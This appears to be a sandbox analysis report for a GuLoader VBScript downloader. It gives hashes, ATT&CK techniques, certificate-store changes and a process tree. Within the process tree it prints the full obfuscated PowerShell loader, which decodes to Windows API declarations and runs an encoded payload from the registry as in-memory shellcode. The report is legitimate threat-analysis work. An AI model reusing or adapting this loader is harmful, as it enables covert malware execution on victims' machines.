guloader | f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e

General

Target

PO7675JH647R-7458003.vbs
Size

339KB
MD5

6af7dfbc2f5a867f11b8adff1150b5ba
SHA1

8e1d49a3856c57da40973102a96b892a31dee7f6
SHA256

f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e
SHA512

cd4ea26ffc7b60baf9d92ac64f02babec4a2d93a0bdb4d8d81d95888d83bb5183a8ba8e953fc5f3f264dbec4f239d4f4023825886be022503a6cfebc861ce1c7
SSDEEP

6144:dACvjkhn6pTmKLnbMhZYAEwISL7+qhMRRGdIf5fjeIdnB:dAC+n8SKLnEyc7+sMkoB

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

5 1724 WScript.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
5	1724	WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	WScript.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

260 powershell.exe
260 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 260 powershell.exe

pid	process
260	powershell.exe
260	powershell.exe

description	pid	process
Token: SeDebugPrivilege	260	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 1724 wrote to memory of 260	1724	WScript.exe	powershell.exe
PID 1724 wrote to memory of 260	1724	WScript.exe	powershell.exe
PID 1724 wrote to memory of 260	1724	WScript.exe	powershell.exe
PID 260 wrote to memory of 3692	260	powershell.exe	csc.exe
PID 260 wrote to memory of 3692	260	powershell.exe	csc.exe
PID 260 wrote to memory of 3692	260	powershell.exe	csc.exe
PID 3692 wrote to memory of 4692	3692	csc.exe	cvtres.exe
PID 3692 wrote to memory of 4692	3692	csc.exe	cvtres.exe
PID 3692 wrote to memory of 4692	3692	csc.exe	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO7675JH647R-7458003.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Raillerendes = """OmostABermmdHavebdFunni-SiddeTSkovryTavenpPseudeFilet Waitr-Moll TGhostyApplipselvbeOniomDSkrppeDobbefSprutiIntegnOptaniGladdtAssasitierloHindunAmeri menth'Agog uUffossHerreiNonornArtligHiela ArveaSInebryOverdsNomogtFrgeteSpademDoari;SkylduBoonysOrdenikamfenBevgegSchoo OverjSAscenySvesksLathwtBrigaeUndermTellu.DeligRPhoneuUrovanSubjetSalgbiRaacrmStoneeCentu.RegatIIolitnNitratIneffeKalasrSkyggoArctipraabaSfibereChaetrSyncovGummiiTsenacDampseSunetsCasea;Ctge pGlairuEleusbUstemlMineriPackecShred UncensnonvatOutstaSuspetKomitiIndtjcTrave SknnecbunyalPareeaUlemasHovelsKunst EnbaaUnedtrbBlokaiSfrisqOna CuProclaclunirunperiGraenaMorgenArbej1Brat {Ordme[SuperDSurinlFrafalKlaveITubermDiasppEnkeloWivanrBevgetsdlad(Carte`"""PublikfundaeAftenrMeeklnScreaeTrilllIndby3faire2Belin`"""Ename)Super]solilpQuartujollebMeddelFrijaidernecLeuco scampsAlfabtTisseaKerautInteriCamercStrab TobiseUngdyxImpretdebareBlastrSjakrnNeutr KondiiIdolinPoly tSkill FladsStumbleLandstUnaleEBruttnKattevDampbiAntitrCand oGrowsnLovkemIntereDrslgnEllevtLotmeVDaekkaRevolrHjertiBroddaSketcbcertilForskeKathe(reaktiHjertnPhenatPhoto NnsomPKailyhStileaBradyeSkulknBattl,BengeiBogklnSo Putpjokk JammeLLimpioFruitxAnthooKontosUnpar)Pooft;Smitt[OverpDCrowsltechnlTelefIUbetimUshabpInderoTaklirJornstDirek(polre`"""IndviwActiniPressnPlovmsCampupPektioBacheoLignolStrat.RmnindtesturKraftvUdspe`"""Flee )Lumbo]KlasspSimuluDetenbStilllJulemiSnitccFolke DagfisstethtDigtaaMosertKaerkiMeloncrevet FinnieIagttxUddritIntereRiflirAdditnRashe EmbaliSejl nLnkontSubce bromcECertinBrugbuAgatemHalvgPAhmedrAktieiSatranIndkatTjenePGenudrAlkohoUnconcTrembeKursusFingesHumoroFrg TrTetraDLedniaAfslutNdrinaBelshtdeperyFinelpklumseOverssForle(AarsaiscopansoldatKejse TilliSAccoiaOphavmSuperlAerog,AsbesiBataanmarketEkste LifliAMushrnOxalitlivsseAlder,tabskiParasnCallitJernm UnnorITellusSsonshSeptamNeuroaToccaeSusta,SelveiHenlanPrevotHumrf ThingPStifteLithilVeinatAfstraWhang,Sond iKritenUnzontHjert BekraTStramoDispawIdeol,GenskiNonnonYppigtProtr TolteCUnttroLejliudispulTuninoPlsebmSpeci,TeleoiGestinOpsumtSumpg TransKSammelUdkkeuStandmBrackpGlori7deval0Georg)Smrin;Adels[AnilaDDjavelCallilNonveIKatabmFaciepTenenoAnsvarudviktimper(Uncof`"""tommeuLumacsChloreMusikrGulli3Creat2Prima`"""Provo)Cecch]TrovrpHypnouTarasbAstrolSlnggiSpunncOracu BecomsSnifftPhageaTomkitAdganiWhirlcnight SkyrieKirmexoligotLaboreLavenrBrominSkarp MustiiAfholninexptMedal OverrGMaskieKonomtUnfixSStorkcLaborrChickoLeverlgenbrlCalotRfortraKlagenStngngNonreeForbn(LydspiRstennTvrvetSpeci KnaphamodvinFinskvPyrogeEyestnYippidHobby,SpunsiRelinnPeerltPorte RoystTJoculiAngiotNedlg,ForpaiKns UnNeurotHotsh FolkeBHeraceAdvermSaithgWansotFumag,ExsufiSouthnLigkatAprax DonkeCExprooTraumsHepatmHastvoRelat)Sphen;Murmu[EmigrDUdhnglGbakklVideoIKonvemEjacupKaravoRetmsroreodtPerse(Tropi`"""ThundkUdspreDatabrNowhenTraiteRebstlBreas3Skift2Seawi`"""Ufriv)Under]SpirepMarrouUnescbFrifilSvaleiDdfdscChole TormisFartbtCarilaIndtjtskkesiMogulcMinim BedaaeSkambxDispltUdmareDandyrCarlinOvere fatteiSmallnNonsutDybst MistrSGrsk eStrejtDksskCPosseoDupskmMaintmFarciSKledgtSpildaStradtChefseTungt(NonpriKamiknBurnitFodbo afrusMLetsiuDecimsBillsiUngtjcYanat,BaskeiBydelnUnebbtQuist upgroUThrenmAutoriFilmsrSydamiNorma)Hosst;Unsta[ElectDBhowalplashlAhuehIIndenmTrapepSizesoCommarstuditUpgra(Vgkor`"""DeadfgprodsdMelliiDubbe3Matri2Turis`"""Misfo)Lully]SaltwpStanduKendibhemoplReferiSalmecSubst PhacosRatihtLysinaMetamtUnderiSmagscOverh SemafeSuperxGleamtVha PeLaughrmonotnNutri BolleiKimminOffertDisse PouchGEnergeDuetttRuderTBkkeneTrypexSupintScuffCIgnorhAnuncaUnwarrChetaaHase cFortltImpuleBurlarLagerECimbrxIdolatUnequrBartiaUnder(FabriiFenesnEngeltOrbel BrekrSAdwarhSprgeuad fonJorun1Kolds6Frnde1Deici)Brodk;aligh[ElskoDImprglMisstlUnicoIStakomFrilapRegleoSerjerAfgastGrump(Mosle`"""RnkefgAntiedBjrneifilia3pigta2Overk`"""Medic)Flok ]SandwpArabsuEwderbRoedolfjerdiAftrdcNomen VellosTopattKonceaPersottuxediGaiascCoeru SoegeeStowpxStriktIndkaeYpperrFlygtnUreel DismaiSammenSerietProte CanoeGAskleedasketElskeFPolaroTemponUdplytFaux LExhalaDanilnForetgDroneuHyposaByraagOpenceIslanITransnJonglfAzocooMolin(barytiRotunnEclattopper Pads OJoubavPlanleSprs )ozonl;Pensi[MaterDCentrlBundflBane ISpirumHesitpFrivooJuvelrDatamtTalar(Fremd`"""IlleguTomatsRansaeAmenorSwelt3Auxot2Subse`"""Skrat)Untot]BrdebpKontruJabbebInterlGruppiDundycMatth equilsStnintAustraUnmectKondiiStjlecGgegu SynsfeJvninxHypostDicareTransrIrratnTypen ChordvPecunoCivvyiByomrdPlatt GardemPolygoNasotuOvercsGermaeSprog_MissieModspvInsuleUptilnReoxitFalds(KedeliIngegnSubtltVarml LappeLBissoaDenienDistrdFrysesGaybidParts,SteariSonysnoksertSubha PrecoVVolcaaSewernOpvarePreen,FoddeiRorqunSocintUnsom KalipPVvstyrChampeenlarsScapeuSikke,CreatiSpeednAfgratspads SpredRSelvhehomeoaKavalnRallunAbbas,Wick iNonlunEnswetBalle ArkivRAntiduPletinGrupptNonma)abnor;Douci[ReoutDTonsolEngralKohisImechamCartepSubmioBoomerKaraktScoop(anapt`"""EposeABalg DDeuteVskattASkosvPHoldnITegle3Calam2Boxwo.ForurDkaritLmycelLTelep`"""Trans)Entre]PhotopVolumuShrufbChanflinciciJodticrutil SurmosTouchtSulkiaHomoetindseiFrakecBehav SeedfeBestixBeskftVichyeSankerCypranAlder SkiagiKjrulnBocedtSlutb MonitROverseMyonegLavenQTrkpauRepayePetunrUnavnyAposeVRedheaSnyltlAtlanuIndkleOsteoERecomxTekst(ThundiPiurinCalfhtWindy SkrivcSamvioHykleuSkillnLectitProsp,FossiiOlivenOutswtLyric Undt mRadenaBottsiMalle,AgariiGodtenAloewtrvene GldelDObligulindblFortrlrokadeGldes,PapabiAtomvnTipistPriso FangeMArkiviAlbuerAtomkaMerudtPosseiPizza,DuettiDobl nKeel tBefor NoncoCBjrneoOmvursRacinmSolde,ZaniniBusstnDyttetSkrue VindiSWilheeCaragnFaldesInforifossufJudah)taxif;Confu[ViduaDForhrlTribolSyresIportymHealfpmaksioMailsrMenedtDical(Threa`"""OverfuPlanlsuncoreJozetrAllin3Centr2Pread`"""Trich)Sampl]meritpOpblduEfterbOpraalProduiMntuncFutur CyklusPotastAndelaSystetStrudiegrescMinis CentaeExuldxVaerdtJoannegrafbrRelatnAfpro DelatiunoccnBelaitKapit HeterIVervenDittesNonfieBroncrTrolotLdrevMTernaeSpndenScopouAfskn(MicroiEksisnGenevtdinky VanskSPedanuFagudlsuler,RysteicocknnStorvtPignu MesioEgenpavbetrdoTaksa,KultuiMennenRespitLedeo HandePBidrylBuskeaDiacriOverhdlatif,SkaffiBillanFinantMtrik TyrolSFetaoeEgalirBlindvTurbo,BulbiiApprenUnrestSubpa OpiumHConveaTrekavPseudeHrelrlHogli)Gldsp;Inter[StangDPoulilbestelAfsluIForskmSpreapluftaoSektorWildwtIrres(Skyri`"""PicarkHistreWriggrHandenJuviaestrubldagen3Ven H2Indle`"""Tanka)undes]TjekkpAlderuMiridbEcclelStimeiIndlacPrere TudsesDiskutSkibsaVippetTritiiErobrcSoliq VoetseFldeoxOophotTabeleRapkfrHeritnTheri RifleiSportnFjerktbille KrysaVAmantiembowrNonprtEveryuPhotoaLaboulHespeAHelbrlOxbitlAfteroBaroncTilvoEPersoxAreol(SquatiOrrownSpilltgotha BicorvCompl0Parke,BarneiGradinMetactVagin SaddevDeedb1Maked,GenopiHelicnRessotIndsk attacvStraf2Tilba,NevusimellenBarettOarfi SalubvLamin3Yngle,SknliiUtugtnNunbitEbull KlipfvLinie4Forma)Hoved;Recry[AischDVoldtlBagaglSheveIDaisymDiurepVirksoRoselrRemattBortf(Inqui`"""QuinqkIrreaeTilkrrbureanForsyeRowdylFluid3Unass2Robin`"""Parac)Dilat]HektopAristuStudebSortilHatteiParamcPatro DejkrsCollotLogfiaSkramtcarvoiUnmarcSchoo OpspaeLucubxPirattImpreeLeewarCroppnSgsma Pinx ICurtanplacktFlaadPStriptFlexirUnbil VragrEHls Bndame uFamilmCatalSSorelyForflsDimertBygrneSkrmrmAfstdLFutiloInchocColluaforvelSommeeGlandsEksisAOvert(BeeheuNectaiKantnnNoncatJomfr TypehvGavnl1Valut,EstiviToilenTidvitBlikd delesvUncon2Layou)Brnei;Tempe[afstaDJeaablArbejlBindiIBitstmResetpBdelloStaberEkingtLarme(Brand`"""PrejuwVodouiAlabanWhittsVsenspLilleolituroRustnlSubve.UdgivdVandlrafmelvPigeb`"""Overr)Rundk]VidtspFulmauOxidabunderlBumleiWiddlcUdse LancesHaltetRuralaWoodktStyrkiTredocDecad PiggyeMaltnxHalbetMagnieTarnarVenernGlunc AntieiSaturnCoevotMislo GallaDRnevieCorpolGammaeCrooktMusopemoradPUnfluoStenfrOveratPumic(OmandiEksamnUndertTirsd BosatMMaskiaGummarSteencClodhhsphra,TuckeiGastrnStenltDeaco TransOChallpArgumrRendy,PrismiPageunRenowtInter DrawsKtyfoiaBogenmOpsta)patar;feu m[diffeDteleolhugnilIdrifIAlopemPansrpNedgjoVaganrHauratDruth(Jazzm`"""ArachuBrnebsHorteeJanosrEmbed3Opsig2Ramle`"""Ulovm)Inval]VocalpSamekuMediabGametlHoffeiHaarfcRokke PeriosKansltunricaHulhetmediciStangcCatyd FirkaeHazelxtubertMoodiePrefarKommunMisex LaaneiDeplunhimmetRefus TabelSTeknoeEnogttDepreDRetsklTophngCisrhIBermmtPopulePpi FmBotswTUsbekebassixSupertafskr(SalteiIndeknDispetSagsa RelatSVisuapAilereAnosm,SysteiBlastnDesartRetou DiagrPKonkuoNoncodSminkaEksdi,ImmeniInternGodbitLatom AppreEunspalBrydneAnaps)Coped;Decyl}Pleje'Cirku;Compa`$DidapUbookybInteriFiertqAgitauAmfitaRecaurProtoiAlgotaLithonMaart3Kreds=Musik[GonzaUAprilbHvirviEmanuqaftenuLysogaBrewerPdagoiSkdenaDialonGylde1Forfa]Chalc:Komma:LagerVSemiqiEuroprIdoldtMicrouStaalaWestwlJitneAmoxo lPhililCigaroSpulicanalyERisibxbldgr(Indvn-Oktan1Kreti,Reine0Nonpr,Taftf1seism0Skatt4Tulla8Hw Hy5Tenuo7Rundp6Colov,Bbs A1Spiri2Intri2Under8Hjsso8Melle,Snees6Paddi4Gasrr)Hobby;Pleni`$SuffrLUncraeHarnidProstdHaandeBardetagglu=Monol(TartaGSociaeMyg CtTords-PelleIGrnsetNavneeNonglmKronbPSkankrstrmpoRigsrpSamekeCrackrHydrotOxytoySocia Koldt-LftenPScryiaHistotAxofuhAlche Fodtu'AurifHDimerKSarruCFrakeUTwist:Fuske\pladeRCadeaaLevigaArrannnonlioNedflkOleogkJournePrejunStruk\SparkTclaudaEscalaChillgHyperetaarehStraboHovedrStabinplowfsatlet'Mongi)Commi.ManicMFlueseSkrmmdNringlBigambSyrupeBijworNonspeTetra;Nords`$GeocoBStresinusselAffrelGenmaeSkabetAkkoltMatkarInspeiParcecAnklaeUrfolrMilienVikieepullo1Tauro8Leafb4alarm Vendi=vanke Kvgpr[PavenSAnticyFantasBilletHelheekontomLaird.BravuCStramoRaagenHoin vPardoeVoyagrAvisatSkumm]Zootr:Lasci:UnhooFStninrMockaoGrossmMulisBBindiaStiklsOophyeVeikk6digra4stranSCinnatPersprRehumiRedelnJudicgDysme(Sulte`$WhiteLAntoneFotohdInjecdAnonaeBdetatUnqui)Copre;Purpu[ElvteSMosaiyUdefisAlgertCoenoeRigsrmMakar.HampeRStikfuTreventilvitMumieiGennemBiofaeJusti.FiskeIChildnPrefotVaaseeMidmorSdvanoDiagopTilsySPolyseVellirTaraxvUkraiiInconcUnderepoecisAnfrs.PitprMTetroakritirPuppysCussehCanbeaTrninlToppu]Termi:Gravi:OkkerCudgruoHierapSkulkyNatio(Luteo`$UngelBKrimiiVedlglhelnolFibroeMinortIsbjrtLejderScieniYugascDrifteAntikrModulnLejebenamar1Chicl8Ravag4Teles,Deleb Vitic0Taans,spill Hyper Galli`$VenneUTvrfabRodskiJammeqFlettuIncanaHyperrOleaniSugetaStabsnstore3Rld N,malur Stran`$MiniaBUkunsiAcesclArgollDekoreTargetSpiketOpstarBagstiAldercSigneefilamrInternFlleseStyrk1Prere8Train4undif.OctilcPlanloDuftruVidernUndertBysac)Dansk;Crass[GgedaUOverfbSynkiiRulleqAvissuWalesaSeptirTenneiFiraaatonefnhoved1Artsn]Uncon:Telep:LittlEScintnBedrvuGennemInsemSCanvaySpokesUndertDryadeSjuskmVanisLHalvaoUmppicResumaChoralHonoreGenfrssidelAObser(Butin`$HalmlUVindhbCarleiTransqOphthuinvaraSalvirMicawiKontratiresnKrepl3Pyrog,Defil Acule0Syphi)Primr;""";Function Ubiquarian4 { param([String]$Baghjulstrks2); For($Unstressedness=5; $Unstressedness -lt $Baghjulstrks2.Length-1; $Unstressedness+=(5+1)){ $Ubiquarian5 = $Baghjulstrks2.'Substring'($Unstressedness, 1); $Forehood = $Forehood + $Ubiquarian5; } $Forehood;}$Baghjulstrks0 = Ubiquarian4 'ReforIWhoreEMyosuXTilra ';$Baghjulstrks1= Ubiquarian4 $Raillerendes;&$Baghjulstrks0 $Baghjulstrks1;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:260

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwoqdzyq\jwoqdzyq.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3692

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC40.tmp" "c:\Users\Admin\AppData\Local\Temp\jwoqdzyq\CSC5CF53EF4F22041B7A7FA81AC2E50F0A3.TMP"
4⤵
PID:4692

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBC40.tmp
Filesize
1KB

MD5
0e01fe7db6d50e841fb628ef062de373

SHA1
2b502462e1d2e3b2984bf5901befd5f39c486be5

SHA256
903b91eb571a940d6fd1b096f376ed6ab785591482e16128d700af0ccd0f7708

SHA512
5596065946a0906d5b2574dd01c6355e3ad1a9c680bdd57ed29f4246a3f8b354801751040531c42e8fe9b096aad1f72220cf20930fbf0e7004d347ad14da4360

Download Submit
C:\Users\Admin\AppData\Local\Temp\jwoqdzyq\jwoqdzyq.dll
Filesize
4KB

MD5
65b3117f815b40b42ff3d082488bb595

SHA1
48bf94cd57617e8a046a2cd8730740961d1d0a78

SHA256
bcb2376470e261aeada045b1c41820b40ccea0dec7e828b5d581ce7aa4433399

SHA512
580e0e07f2dd5e388f8e38a4eca1c65f0e0aae4c942eae38560c6e7fcd3474f08f9fedae03d08a4bc5644babb29b52033dfb715d32ad510f6b9fdd92a1c398b8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jwoqdzyq\CSC5CF53EF4F22041B7A7FA81AC2E50F0A3.TMP
Filesize
652B

MD5
02d0f3d4a3085ab01dada358e64a446b

SHA1
720ad80fbf1bc37b946ae811f1f7f02b53156268

SHA256
a9d22f016de014873946f4eea785fedd0219e9c9952b3566f02066ba8ec1e6b1

SHA512
5f5732aa22d75a52220f151a3a3dee9ff10bc757c1c4b6bd5939987cd808eec3dc93e63b843e27922e17a35511bbb35677d3ed7b134f258a64c893e8c6359562

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jwoqdzyq\jwoqdzyq.0.cs
Filesize
1KB

MD5
